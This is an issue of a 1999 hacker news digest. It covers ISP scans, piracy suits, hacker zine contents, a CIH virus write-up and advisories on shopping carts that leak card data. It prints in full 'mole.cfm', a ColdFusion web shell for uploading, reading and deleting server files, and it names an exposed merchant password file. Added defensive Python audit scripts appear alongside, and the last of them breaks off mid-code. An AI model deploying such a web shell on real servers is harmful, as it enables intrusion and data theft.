        Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>


      
    ++ Ministry does scan machines 

       from HNN http://www.hackernews.com April 30th
    
       contributed by Sunny 
       SingNet and SingTel Magix, two ISPs located in
       Singapore, have admitted to asking the Home Affairs
       Ministry's IT security unit to scan 200,000 of their
       subscribers to see if their systems are vulnerable to
       hacker attacks. The ISPs asked the Ministry to perform
       the scans because they were the "experts" in this
       area. Users were not informed of the scans
       beforehand. This new report of scans is evidently the
       cause of yesterday's report that Ms Lee, 21, was being
       "attacked" by the Ministry of Home Affairs. (Sure wish I
       lived somewhere where everyone looked after my well
       being so closely) 

       Straits Times 
       http://straitstimes.asia1.com.sg/one1/one1.html
       Nando Times
       http://www.techserver.com/story/body/0,1634,43806-70661-511093-0,00.html
    
    
    
    ++ India Stomping Out Piracy 
       
        From HNN http://www.hackernews.com/ April 29th

        contributed by Dumbo 
        Officials in India want to stomp out piracy. They felt
        that the best way to do this was put their foot down
        and the bigger the foot the better. So they got an
        elephant to stomp on confiscated pirated CDs in New
        Delhi's Nehru Place. 

        http://www.news.com/News/Item/0,4,0-35780,00.html?st.ne.ni.lh
    
    ++ MS Sues FLA Companies 

       From HNN http://www.hackernews.com/ April 29th
       
       contributed by Code Kid 
       Microsoft is suing 15 Florida companies alleging that
       they sold or installed illegal copies of the companies
       software. Microsoft isn't able to estimate how much
       software piracy costs the company but it is able to
       estimate what it costs the state of Florida. Microsoft
       claims that Florida lost 7,186 jobs in 1997 and $490
       million in lost wages, tax revenue and retail sales. Yet, it
       has no idea what piracy costs Microsoft. 
       
       http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
       http://www.zdnet.com/zdnn/stories/news/0,4586,2249422,00.html

    
    
    ++  Antidote Vol. 2 #1 released
       
        From HNN http://www.hackernews.com/
        
        contributed to HNN by Lord Oak 
        The newest release of Antidote is now available. With
        articles on Anonymous Surfing, ICQ99a Security
        Glitches, Intruder Alert '99, the eBayla Bug and a whole
        lot more. 

        Antidote; http://www.thepoison.org/antidote/issues/vol2/1.txt
    
    ++  Hackers Defended 
       
       From HNN http://www.hackernews.com/
       
       contributed to HNN by erewhon 
       Mainstream media is actually publishing a positive and
       accurate story about hackers. Better read it quick
       before they pull it and come to their senses. 

       ABC News
       
       http://abcnews.go.com/sections/tech/Geek/geek41.html
    
    ++ This has been up in the air for the last couple of months or so; looks like
       the ASIO (Australian Security Agency) is still pushing for the right to be
       able to break into personal computers if such systems are thought to contain
       data that is detrimental to the country's security... who watches the watchers?
    
       From HNN http://www.hackernews.com/ 
       
       ASIO wants Permission to Break into Home Computers. 

       contributed by Anonymous 
       The Australian Security and Intelligence Organization
       wants a widening of its powers so that its agents may
       'hack' into personal home computers. These new powers
       will include the ability to manipulate data so that their
       entry may not be detected as well as breaking
       encryption around data that they want to see.  

       The Age; http://www.theage.com.au/daily/990428/news/news8.html
    
    
    ++ Keen Veracity 7 was released Apr 22nd; I missed this last issue
     
     -----------------------------------------------------------------------------  
                         K E E N  V E R A C I T Y 
               L E G I O N S  O F  T H E  U N D E R G R O U N D
                             I S S U E  # [7]
     -----------------------------------------------------------------------------

                              --[CONTENTS]--

    (1/8)--[Introduction]---------------------------------------[Digital Ebola]
    (2/8)--[Redir games with ARP and ICMP]-------------------------------[yuri]
    (3/8)--[FUN WITH THE ES-3810 AN ATM REALITY]--------------------[optiklenz]
    (4/8)--[Ip Aliasing]-----------------------------------------------[guidob]
    (5/8)--[Yet Another Newbies Guide to Linux Security]--------[Digital Ebola]
    (6/8)--[UBE98 -- Unbreakable Encryption]----------------------[Joe Peschel] 
    (7/8)--[Windows 95 Protection]-------------------------------------[NtWak0]


    ++ b4b0 releases issue #7 also April 26th...full of goodness, get it today
       
       (00). Greets, Hellos, Staff, What not.
       (01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
       (02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
       (03). How to have an out of body experience - [ph1x]
       (04). Womper language interpretor - [chrak] 
       (06). Buffer overflow exploitation - [ph1x]
       (07). The stupidity that lies in credit fraud - [KKR]
       (08). Screwing around with /dev/audio - [ph1x] 
       (09). My day in age(Firewall, a magic bullet?) - [rhinestone]
       (10). d0x (For your harrassing enjoyment) - [pG]
       (11). Coding a shell from the ground up - [ph1x]
       (12). The art of writing shell code - [smiler]
       (13). The telephone system/network part 1 - [pabell]
       (14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
       (15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
       (16). IRC lawgz, cybersex erotica - [b4b0]
       (17). Revolution against the catholic church - [schemerz]
       (18). bsaver.c overview - [cp4kt]
       (19). Conclusion - [ph1x]  
        
         + juarez ;)
 
     Mucho thanks to Spikeman for directing his efforts to our cause of bringing
     you the news we want to read about in a timely manner ... - Ed

     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       More great poetry from Liquid Phire!;
       

       From: "liquid phire" <liquidphire@hotmail.com> 
       To: cruciphux@dok.org 
       Cc: Uzi@Rave-Generation.dnx.co.uk 
       Subject: greatness 
       Date: Mon, 26 Apr 1999 23:08:26 PDT 
       Mime-Version: 1.0 
       Content-type: text/plain 
       
       
       ***another? yes *sigh* oh but i must. sanity is only as close as a 
       pen.***
       
       
       
       
       "to be great is to be misunderstood"
       
       
       we are to be remembered as names, not faces. we are to be remembered 
       as notions of truth, not as images flashed on the evening news. the 
       cost of infamy and fame are more than those who possess might care to 
       admit. it is better to be great without being misunderstood, to change 
       the world without attracting undesired attentions.
       
       
       the time for lies has passed, this is a dangerous spell and we can 
       leave no option of damnation open. the future of the internet will be 
       determined by the actions of those on it now, advocates of censorship 
       have found new hope due to recent untimely events. sinners tricked as 
       saints are controlling the country as we now walk on thin ice.
       
       
       safe are we within our bunkers of pretenses until the ebon shadow of 
       reckoning nears, when the end comes we need more to hold close to our 
       translucent hearts than the newspaper clippings and the vague texts 
       that are our legacy. the media has gotten the best of this religion, 
       and our minds have gotten the best of our hearts.
       
       
       as but comic book superheroes that have flown too close to the sun our 
       luck will not last and the curtains will one day part to reveal a few 
       disillusioned clutching close their tattered capes. already some have 
       sold out, a mistake that can be easily made but should be avoided to 
       protect the integrity of what we should represent.
       
       
       hope for understanding is not one of the desires that lies in mens' 
       hearts, no war cry has ever been for peace. the walls of the fortress 
       need to be smooth with no cracks and fissures to provide the 
       weaknesses needed for foes. the masses, like fire, can be used for 
       both good and evil, it is those that tame them that save, or damn, the 
       world.
       
       
       phiregod
       liquidphire@hotmail.com
       please excuse all errors
       i welcome all comments and constructive criticism at the above address
       
       
       
       -=-
       
       
            
       ================================================================       

      @HWA


  02.0  From the editor.
        ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *No comment, its issue 16 already, just read it.... ;-) this issue is dedicated to
      *#99 and the folks in Denver... so sad we have to have copycats isn't it?
      *
      *
      *
      *                             - Ed
      *
      *
      */
      printf ("EoF.\n");
      }


      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.


     @HWA
     
 03.0  Telecardnews site, phone card and smartcard cracking     
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://members.tripod.com/telecardnews/index.html
       
       I stumbled across this site during web searches, it has some interesting info
       on telephone card and smart card hacking and news about recent goings on in 
       that world.. here's a sampling of what they have online.
       
       
       
       TELEPIRATES BUSTED !  Reports are
       reaching us, as yet unconfirmed,  that the notorious
       Telepirates have been raided.  "Heavies" allegedly in
       the pay of Telecom Companies and Telecard
       Manufacturers are believed to have carried out
       vicious attacks on the Telepirates main premises in
       Holland, Spain and USA. It is well known that they
       had trusted agents world-wide who may or may not
       have been affected by these raids and we await
       confirmation of this report.
 
       It can be confirmed that their main order page on the
       net has been removed .  This action may have been
       performed by themselves or by the Law
       Enforcement Agencies possibly involved.  It has
       been known for some time,  that Gemplus (a major
       smartcard producer) was thoroughly investigating
       telecard piracy and those connected with it. 
       Nobody was more connected than the Telepirates
       who flaunted their expertise across the whole world
       wide web.   
 
       In view of this development, and a tip off from a
       known Telepirate member, we recommend to our
       readers (perish the thought that they would consider
       anything remotely criminal) that they should not
       under any circumstances send payments to the
       Telepirates, until further notice as this will probably
       end up sequestrated or in the hands of the
       Authorities.   It is also likely that Bank Accounts
       have been compromised and possibly frozen.
 
       Keep watching, we will keep you updated. If
       you have any information regarding this
       breaking story, contact us immediately in
       confidence.  We will not divulge the source. 
       
       
                                  TELCOS INVOLVED IN BUST April 13th 1999 
       
       TELECARD SECURITY NEWS: This is the latest news on this story. 
       
       Our investigations confirm that major smartcard companies and telcos were at 
       least aware of the Telepirates bust. One international smartcard manufacturer
       gave the following statement:
       
       "We will neither confirm nor deny any involvement concerning this criminal group. 
       Anyone who attempts to penetrate systems by illegal means, including the 
       perpetrators and their supposed clients are all law breakers and should be dealt
       with only by the appropriate authorities".
       
       We did contact representatives of other Telcos and smartcard manufacturers and 
       they all declined to comment on or off the record. In our enquiries to these 
       companies, we referred to the Telepirates only as "phonecard hackers who were 
       raided recently", yet two of these companies mentioned the "Telepirates" by name.
       This was a touch suspicious and despite our insistence that they answer our 
       questions, the stock answer was "No Comment"!
       
       Final Note: Our readers are reminded that THE TELECARD SECURITY NEWS cannot 
       condone or support any kind of illegal and criminal activities. We do strongly
       support and encourage dissemination of information for security reasons and 
       lessons can be learned by all concerned....
       
       Next update. Hopefully we will have more information from Telepirate spokesman 
       "Frazzle". Watch out for more of our news updates and if you have any information which
       we can confirm, please contact us: http://members.tripod.com/telecardnews/email.htm
       
       
       
       
       
       @HWA       
       
       
 04.0  Coldfusion mole.cfm
       ~~~~~~~~~~~~~~~~~~~
       This didn't make it into last week's issue, so here it is now. It's the template that
       can be used to upload and download files to a ColdFusion server.
       
       From HNN http://www.hackernews.com/
       
       <!---
       This Cold Fusion template is intended for testing security
       on ColdFusion application servers. It will let a web user
       upload, download and delete files on a server. 
       
       Use this only for good, not evil.
       Kevin Klinsky
       kklinsky@themerge.com
       --->
       
       <CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
       <CFSET THISTEMPLATE=GETFILEFROMPATH(GETTEMPLATEPATH())>
       
       <CFIF LISTLAST("#DirPath#","\") IS ".">
               <CFSET DIRPATH=GETDIRECTORYFROMPATH(DIRPATH)>
       <CFELSEIF LISTLAST("#DirPath#","\") IS "..">
               <CFSET DIRPATH=GETDIRECTORYFROMPATH(LEFT("#GetDirectoryFromPath(DirPath)#",LEN(GETDIRECTORYFROMPATH(DIRPATH))-1))>
       </CFIF>
       
       <CFIF ISDEFINED("uploadfile")>
               <CFIF LEN(UPLOADFILE) GT 0>
                       <CFFILE ACTION="UPLOAD"
                               FILEFIELD="uploadfile"
                               DESTINATION="#DirPath#"
                               NAMECONFLICT="OVERWRITE">
       File uploaded<BR><BR>
               </CFIF>
       </CFIF>
       
       <CFIF ISDEFINED("deletefile")>
               <CFSET DELETEFILE=DIRPATH&DELETEFILE>
               <CFIF FILEEXISTS(DELETEFILE)>
                       <CFFILE ACTION="DELETE"
                      FILE="#deletefile#">
                       File deleted<BR><BR>
               </CFIF>
       </CFIF>
       
       
       
       <CFIF GETFILEFROMPATH(DIRPATH) IS "" OR GETFILEFROMPATH(DIRPATH) IS ".">        
               <CFDIRECTORY DIRECTORY="#DirPath#"
                       NAME=DIRDETAILS
                       SORT="name ASC">
               <CFOUTPUT>
               <FONT SIZE="+2">#DirPath#</FONT><BR>
               </CFOUTPUT>
               <TABLE>
               <TR>
                       <TD></TD>
                       <TD>Name</TD>
                       <TD ALIGN="right">Size</TD>
                       <TD>Modified date</TD>
               </TR>
               <CFOUTPUT QUERY="DirDetails">
               <CFSET NEWPATH = URLENCODEDFORMAT(DIRPATH&NAME)>
               <CFIF TYPE IS "Dir" AND NAME IS NOT "." AND NAME IS NOT "..">
                       <CFSET NEWPATH=NEWPATH&"\">
               </CFIF>
               <TR>
                       <TD>[#Type#]</TD>
                       <TD><A HREF="#ThisTemplate#?DirPath=#NewPath#">#Name#</A></TD>
                       <TD ALIGN="right">#Size#</TD>
                       <TD>#DateLastModified#</TD>
                       <CFIF TYPE IS "File">
                       <FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post">
                       <TD><INPUT TYPE="submit" VALUE="Delete"></TD>
                       </FORM>
                       </CFIF>
               </TR>
               </CFOUTPUT>
               </TABLE>
               <CFOUTPUT>
               <FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat(DirPath)#" ENCTYPE="multipart/form-data"  METHOD=POST>
               <INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR>
               <INPUT TYPE="submit" VALUE=" Upload ">
               </FORM>
               </CFOUTPUT>
       <CFELSE>
       <CFFILE ACTION="Read"
               FILE="#DirPath#"
               VARIABLE="var_name">    
       <CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
       </CFIF>

       For more info on the ColdFusion hole, how to protect yourself, and how to see if your server is vulnerable, check
       http://www.403-security.org/Htmls/news.htm and follow the bugtraq link.
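       The template above is a file manager: a web user picks DirPath, and CFFILE/CFCONTENT act on
       whatever path that variable holds. The following is an added example, not code from HNN or
       from the template's author, showing a simple static audit a server admin can run over a
       webroot to find ColdFusion templates with the same shape: file system tags whose target is
       built from a variable the client controls (a CFPARAM name or an ISDEFINED() name). The
       SAMPLE_TEMPLATE is a constructed, condensed stand-in for a template like mole.cfm; the
       severity rules are this example's own assumptions.

```python
import re

# Tags through which a ColdFusion template touches the file system (constructed
# list for this example; it covers the tags a file-manager template relies on).
FS_TAG_RE = re.compile(r"<(CFFILE|CFCONTENT|CFDIRECTORY)\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^\s>]+))', re.IGNORECASE)
# CFPARAM declares a variable the URL/form scopes may supply; ISDEFINED() tests
# whether the client supplied one. Both mark a name as request-controlled.
CFPARAM_RE = re.compile(r"<CFPARAM\b([^>]*)>", re.IGNORECASE)
ISDEFINED_RE = re.compile(r'ISDEFINED\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
WRITE_ACTIONS = {"UPLOAD", "DELETE", "WRITE", "APPEND", "COPY", "MOVE", "RENAME"}


def parse_attrs(attr_text):
    """Turn 'ACTION="UPLOAD" NAME=x' into {'ACTION': 'UPLOAD', 'NAME': 'x'}."""
    return {m.group(1).upper(): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in ATTR_RE.finditer(attr_text)}


def request_controlled_names(source):
    """Upper-cased variable names that a web client can set for this template."""
    names = set()
    for m in CFPARAM_RE.finditer(source):
        name = parse_attrs(m.group(1)).get("NAME")
        if name:
            names.add(name.upper())
    names.update(n.upper() for n in ISDEFINED_RE.findall(source))
    return names


def audit_cfml(source):
    """One finding per file system tag: the target path expression, whether it
    is built from a request-controlled variable, and a severity."""
    tainted = request_controlled_names(source)
    findings = []
    for m in FS_TAG_RE.finditer(source):
        tag = m.group(1).upper()
        attrs = parse_attrs(m.group(2))
        action = attrs.get("ACTION", "").upper()
        target = attrs.get("FILE") or attrs.get("DESTINATION") or attrs.get("DIRECTORY") or ""
        controlled = any(name in target.upper() for name in tainted)
        if not controlled:
            severity = "low"       # fixed path chosen by the developer
        elif tag == "CFCONTENT" or (tag == "CFFILE" and action in WRITE_ACTIONS):
            severity = "high"      # client chooses what is written, deleted or served
        else:
            severity = "medium"    # client chooses what is read or listed
        findings.append({"tag": tag, "action": action, "target": target,
                         "request_controlled": controlled, "severity": severity})
    return findings


def summarize(findings):
    counts = {"high": 0, "medium": 0, "low": 0}
    for f in findings:
        counts[f["severity"]] += 1
    return counts


# Constructed sample: a condensed file-manager template plus one harmless fixed-path read.
SAMPLE_TEMPLATE = '''
<CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
<CFIF ISDEFINED("uploadfile")>
  <CFFILE ACTION="UPLOAD" FILEFIELD="uploadfile"
          DESTINATION="#DirPath#" NAMECONFLICT="OVERWRITE">
</CFIF>
<CFIF ISDEFINED("deletefile")>
  <CFSET DELETEFILE=DIRPATH&DELETEFILE>
  <CFFILE ACTION="DELETE" FILE="#deletefile#">
</CFIF>
<CFDIRECTORY DIRECTORY="#DirPath#" NAME=DIRDETAILS SORT="name ASC">
<CFFILE ACTION="READ" FILE="C:/inetpub/wwwroot/banner.txt" VARIABLE="banner">
<CFCONTENT TYPE="application/octet-stream" FILE="#DirPath#" DELETEFILE="No">
'''

if __name__ == "__main__":
    for f in audit_cfml(SAMPLE_TEMPLATE):
        print(f["severity"].upper(), f["tag"], f["action"], f["target"])
    print(summarize(audit_cfml(SAMPLE_TEMPLATE)))
```

       Point it at every .cfm under the webroot and review anything rated high: a template that
       is meant to accept uploads should write to a fixed directory and validate the file name,
       not take the destination from the request.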
       
       
       @HWA           
       
 05.0  More info on the CIH virus
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       April 26th from www.403-security.org
       
       CIH virus infects Windows 95 and 98 EXE files. After an infected EXE is executed, the virus will stay in memory and
       will infect other programs as they are accessed. 
       
       The CIH virus was first located in Taiwan in early June. After that, it has been confirmed to be in the wild in at least
       France, Germany, The Netherlands, Sweden, China, Israel, Chile and Australia. CIH has been spreading very quickly
       as it has been distributed through pirated software. 
       
       It seems that at least four underground pirate software groups got infected with the CIH virus, and they inadvertently
       spread the virus globally in new pirated software they released through their own channels. These releases include
       some new games which will spread world-wide very quickly. There's also a persistent rumor about a 'PWA-cracked
       copy' of Windows 98 which would be infected by the CIH virus but Data Fellows has been unable to confirm this. 
       
       Later on, CIH was available by accident from several commercial websites, including the Origin Systems website
       where a download related to the popular Wing Commander game was infected. 
       
       What makes the CIH case really serious is that the virus activates destructively. When it happens the virus overwrites
       most of the data on the computers hard drive. This can be recovered with recent backups. 
       
       However, the virus has another, unique activation routine: It will try to overwrite the Flash BIOS chip of the machine.
       If this succeeds, the machine will be unable to boot at all unless the chip is reprogrammed. The Flash routine will work
       on many types of Pentium machines - for example, on machines based on the Intel 430TX chipset. On most
       machines, the Flash BIOS can be protected with a jumper. By default, protection is usually off. 
       
       The CIH virus infects Windows executable files (EXE files). It does not infect Word or Excel documents. CIH works
       under both Windows 95 and Windows 98, but it does not work under Windows NT. 
       
       CIH uses a peculiar way of infecting executables. As a result, the size of the infected files does not grow at all. The
       actual size of the virus code is around 1 kB. The virus also employs advanced tricks in jumping from processor ring
       3 to ring 0 in order to hook file system calls. 
       
       There are four known closely-related variants: 
       
       CIH v1.2 (CIH.1003): Activates on April 26th. This is the most common variant. It contains this text: 
       
               CIH v1.2 TTIT 
       
       CIH v1.3 (CIH.1010.A and CIH.1010.B): Activates on June 26th. Contains this text: 
       
               CIH v1.3 TTIT 
       
       CIH v1.4 (CIH.1019): Activates on 26th of every month. It is in the wild, but not particularly common. It contains
       this text: 
       
               CIH v1.4 TATUNG 
       
       Note on disinfection: If you're using F-Secure Anti-Virus for Windows 95 v4.02, you need to exit Windows to disinfect
       CIH. Choose Start/Restart in MS-DOS mode, then execute FSAV for DOS from the FSAV CD-ROM and disinfect your
       hard drive with that. 
       
       By Astral
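       Two details in the write-up matter for anyone triaging a machine by hand: infected EXEs
       do not grow, so comparing file sizes against an install log finds nothing, but each
       variant carries a fixed marker string. The following is an added example, not code from
       403-security or Data Fellows, of a small triage scanner: it walks a tree, checks each .exe
       for a real MZ/PE header, and reports which marker it contains. The marker-to-variant
       mapping is taken from the text above; the fake PE builder and demo tree are constructed
       for the example. A marker match is a reason to run a proper AV scan, not a replacement
       for one.

```python
import os
import tempfile

# Variant marker strings as given in the write-up, mapped to variant and trigger date.
CIH_MARKERS = {
    b"CIH v1.2 TTIT": "CIH v1.2 (CIH.1003), triggers April 26th",
    b"CIH v1.3 TTIT": "CIH v1.3 (CIH.1010), triggers June 26th",
    b"CIH v1.4 TATUNG": "CIH v1.4 (CIH.1019), triggers on the 26th of every month",
}


def is_pe_image(data):
    """True when data starts with a DOS 'MZ' header whose e_lfanew field (offset
    0x3C) points at a 'PE\\0\\0' signature, i.e. a Windows executable."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_image(data):
    """Return the variant description if a marker is present in a PE image, else
    None. Infected files keep their size, so the body must be searched."""
    if not is_pe_image(data):
        return None
    for marker, name in CIH_MARKERS.items():
        if marker in data:
            return name
    return None


def scan_tree(root):
    """Inspect every .exe below root; return {relative path: variant}."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".exe"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                variant = classify_image(fh.read())
            if variant:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = variant
    return hits


def make_fake_pe(payload=b""):
    """Constructed MZ/PE skeleton for the demo: just enough header to satisfy
    is_pe_image(), not a runnable program."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)        # 0x40 bytes, e_lfanew at 0x3C
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")   # PE signature right after the header
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20 + payload


def demo_scan():
    """Build a throwaway tree with one clean EXE, one marker-carrying EXE and a
    non-EXE decoy, then return what scan_tree() reports."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "games"))
        with open(os.path.join(root, "clean.exe"), "wb") as fh:
            fh.write(make_fake_pe(b"hello world"))
        with open(os.path.join(root, "games", "setup.exe"), "wb") as fh:
            fh.write(make_fake_pe(b"\x90" * 8 + b"CIH v1.2 TTIT" + b"\x90" * 8))
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(b"CIH v1.4 TATUNG")   # not an .exe, must be ignored
        return scan_tree(root)


if __name__ == "__main__":
    for path, variant in demo_scan().items():
        print(path, "->", variant)
```

       On a real machine, also note that the BIOS payload cannot be undone by disinfecting files;
       the text's advice about the write-protect jumper is the only mitigation for that part.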
       
       @HWA      
       
 06.0  E-commerce takes it in the gnards, more compromised carts
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
       Date: Tue, 27 Apr 1999 14:39:47 +0200
       From: Bo Elkjaer <boo@DATASHOPPER.DK>
       To: BUGTRAQ@netspace.org
       Subject: Re: Shopping Carts exposing CC data
       
       Been doing some more searches for misconfigured webcarts exposing cc-information.
       Seems like a pandora's box, that just opened.
       
       Perlshop is vulnerable too if misconfigured:
       
       Version?
       Platforms?
       Executable file: perlshop.cgi
       Exposed directory: /store/customers/, /store/temp_customers/
       Exposed orderinfo: Several files, eight-digit numbered names.
        Status: adware. Only requirement is to display a "powered by perlshop"-logo on
        page.
       
       
       Bo Elkjaer, Denmark
       
       -=-
       
                (hhp) SMPS advisory. (hhp)
       ----------------------------------------------
              SMPS (Server  merchant  payment system) has  default  permission  problems.  The wrong
       moded directory is Cybercashserver/smps* which gives  complete  access to view all the config
       and  database  files.  The most dangerous file that is left world readable is:
       Cybercashserver/smps*.../merchants/admin.pw or maybe  another various directory path/location
       depending  on  the  server  and version of the software.  The  admin.pw  contains  a crypt(3)
       passwd.  This  could  lead  to  a  system-wide compromise if it was to be cracked.
              The  official website for this software that  was  found  in the README file currently
        doesn't allow access to view the website, which made it hard for me to build more information
       about this software.
               My suggestions to admins using this software are to disable this software, change
        the modes on the directory and get in contact with the vendor of this software and find out
        when they plan to release a new version of this software fixing this default problem. If
       you  want to play it safe, I would check your server  to  see  if  you  have  already  been
       cracked and hacked.
              I  have  notified  the vendors of this software  about the problem and hope the best
       to all the clients.
       
       -elaich
       4-29-99 10:35:53pm CST
       
       -----------------------------------------
       elaich of the hhp.            hhp-1999(c)
       Email:  hhp@hemp.net
       Web:   http://hhp.hemp.net/  
       Voice: 1-800-Rag-on-gH pin: The-hhp-crew
       hhp-ms: hhp.hemp.net, port:7777, pass:hhp
       -----------------------------------------
       
       -----BEGIN PGP PUBLIC KEY BLOCK-----
       Version: PGPfreeware 6.0 for non-commercial use <www.pgp.com>
       mQGiBDcl8CwRBAD7xCp+A5ORiRzMLS4mPstL1aJadSCXSGyNKEZZ6kZwdO3YhLCf
       2vkeJF0OGe8KRfd8LRxP0f/3syg7lfH77m0OP8NXeoOHD48T8K4Mabp2WEJmUW0r
       J6op94LjFUwqNqYuOa+bVULrotZY6iWlxBWunltu9wrqgP22RVtKAu0PVwCg/2SS
       rYoDCNTH4dlzNcVcza5XuhMEALbmuKISbjeOqsVETYYMdQfr0M/m1YfztjJ2tDS7
       bGfOCFpQUFLyCUt/FHHmlInXQWUSVCgjkp0/giFoY9dX+4IB8wLgfu68BOZM5fft
       I5mxI0vyBSke2kHQTqf3vQ5Yveg6gIB8WW9Pi+MAwLMS3+Hmrar+4GCUOqe9w3yi
       u1q3BADcAM3VkORpkifjK8pWex1fdfvGmLBX5PBuCexl5dpeXdVC+Ktncis9u4yh
       5f/PI/g/Uk4T2D/nF5PA4tSkNvRJaPVZCXjFRfc4K+rzQxuYRePwXFgaHSk9cDnd
       XBq5JM6iXLBGFIJpbbwWkftuFOaJLXdP/DqDaXkjbWXLbH9nN7QhZWxhaWNoIG9m
       IGhocC4gPGhocEBoaHAuaGVtcC5uZXQ+iQBLBBARAgALBQI3JfAsBAsDAgEACgkQ
       bSmqkM1thIxvkQCeIEUYJTwF5nC+T9DUcUqStqpwtiQAoIzw9fqSB026Q+w0CGWe
       BPX9LD5ruQINBDcl8DMQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoB
       p1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnh
       V5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr
       5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4
       XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zaf
       q9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/oCoABrcAodA+Qw
       0QOzptm6arxtaRte4a6ZQs+N4Y63+S5oKBz4/atHGGIqgcxCUaaPCxfcqRMoz6Tw
       ZhxOKe3/xKA+qPRfLP19P3nHcTLZqa/orvohDu235OQHBd5Mi6sr2MUcUL1WfsU7
       fPZEjwu6d3MuXpjJUeFzNezJzIbXNzqFAVQawVH6lV+xGfqjD0zceGFGALvvGVxL
       ANdmCzqjE1LFbqf1Zdd04lKYKSglX4PFz3Ly/jzi22GFxMuGf6ud4R80wUC0zBKO
       RZHX3jPqjrqfbY9dq1vpBNDEugOYPqv3/lNlkoxUzKhJCZLPUcbQQs+BuNUUcRW9
       dEkl71kuiQBGBBgRAgAGBQI3JfAzAAoJEG0pqpDNbYSMFgIAoMUE0SGIfqg0oj9e
       oY9AHDAScmZtAKDgKF7STtRwB4KJ6/Q9HC3gUgGBbA==
       =GJ0e
       -----END PGP PUBLIC KEY BLOCK-----
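        Both posts above come down to the same misconfiguration: order records and the merchant
        password file sitting in directories that the web server, or any local user, can read. The
        Python audit below is an added example, not code from either poster or from any cart vendor:
        it walks a tree, reports every world-readable file and directory, flags the names the two
        posts single out (admin.pw, customers/, temp_customers/), and can strip the group/other
        bits. The layout in build_sample_tree and the SENSITIVE_NAMES list are constructed for the
        demo; the admin.pw content is a placeholder, not a real crypt(3) hash.

```python
import os
import stat
import tempfile

# Names the two posts above single out; a constructed list, extend it for your own install.
SENSITIVE_NAMES = {"admin.pw", "customers", "temp_customers"}


def world_readable(path: str) -> bool:
    """True if the 'other' read bit is set on the file or directory."""
    return bool(os.lstat(path).st_mode & stat.S_IROTH)


def audit_tree(root: str):
    """Walk root and return sorted (relative path, flagged name?) for every world-readable
    entry. Directories count too: a world-readable directory lets any local user list it,
    and under a document root it lets the web server serve a listing of it."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if world_readable(full):
                findings.append((os.path.relpath(full, root), name in SENSITIVE_NAMES))
    return sorted(findings)


def lock_down(root: str, findings) -> int:
    """Clear group and other bits on every finding; the owner keeps its bits. Returns the count changed."""
    changed = 0
    for rel, _ in findings:
        full = os.path.join(root, rel)
        mode = stat.S_IMODE(os.lstat(full).st_mode)
        os.chmod(full, mode & ~(stat.S_IRWXG | stat.S_IRWXO))
        changed += 1
    return changed


def build_sample_tree() -> str:
    """Constructed layout modelled on the posts: a merchant directory with a world-readable
    admin.pw, a customers directory with a 0644 order file, and one correctly protected file."""
    root = tempfile.mkdtemp(prefix="cart-audit-")
    merchants = os.path.join(root, "smps", "merchants")
    customers = os.path.join(root, "store", "customers")
    for d in (merchants, customers):
        os.makedirs(d)
    for d in (os.path.join(root, "smps"), merchants, os.path.join(root, "store"), customers):
        os.chmod(d, 0o755)  # the "wrong moded" directories from the advisory
    samples = {
        os.path.join(merchants, "admin.pw"): (b"admin:PLACEHOLDER_CRYPT3_HASH\n", 0o644),
        os.path.join(customers, "00000001"): (b"name=Test Customer\ncard=0000000000000000\n", 0o644),
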